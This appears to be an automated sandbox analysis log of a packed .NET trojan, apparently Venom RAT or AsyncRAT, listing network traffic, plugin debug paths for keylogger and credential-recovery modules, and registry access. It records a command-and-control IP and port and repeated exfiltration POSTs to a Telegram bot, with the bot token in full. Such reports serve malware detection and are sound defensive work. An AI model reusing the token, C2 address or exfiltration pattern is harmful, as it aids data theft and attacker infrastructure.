Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]		22_2_0544D008
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]		22_2_0544AE9C

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 66.235.168.242:3232 -> 192.168.2.5:61009
Source: Traffic	Snort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 66.235.168.242:4449 -> 192.168.2.5:61010

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:61009 -> 66.235.168.242:3232

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 363Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="680d53c9-ebba-41ad-9250-1beb359e0683"Host: api.telegram.orgContent-Length: 5300Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 364Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fec75c00-251d-4cb8-9c45-79b3df3c6196"Host: api.telegram.orgContent-Length: 4692Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 363Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 204Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="15d75943-c97b-479a-8ffa-c4a3776220dc"Host: api.telegram.orgContent-Length: 884Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f55f720b-4135-40c0-87de-817a9f7de06d"Host: api.telegram.orgContent-Length: 187231Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 171Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 351Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="fdb9ea01-1ae2-433c-a1ca-379b15d02c9c"Host: api.telegram.orgContent-Length: 731Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="d131e3aa-cf24-430d-9771-63553786180d"Host: api.telegram.orgContent-Length: 2725Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 154Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 347Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api64.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e1a547f3-58c8-4c01-9faa-06be2ad112c9"Host: api.telegram.orgContent-Length: 468550Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="c9ea3915-752d-415a-b207-143db89b04e6"Host: api.telegram.orgContent-Length: 1955Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 493Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 351Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 181Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 154Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="617fa9fc-b519-4623-a5ab-ad420e993788"Host: api.telegram.orgContent-Length: 4037Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="6025331e-f70c-4be9-81f7-bc188ef699dd"Host: api.telegram.orgContent-Length: 2733Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="2a68e35a-9d40-4e0a-9976-ab68846c28ec"Host: api.telegram.orgContent-Length: 468550Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 188Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 374Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 160Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="af669190-cc5a-412b-a104-c83d4e004a47"Host: api.telegram.orgContent-Length: 673Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="110de683-f34e-4774-8a2c-41f5f8a24236"Host: api.telegram.orgContent-Length: 516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="f78550a6-a677-44a2-9e89-71f546a24bed"Host: api.telegram.orgContent-Length: 16076Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 192Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 386Expect: 100-continue
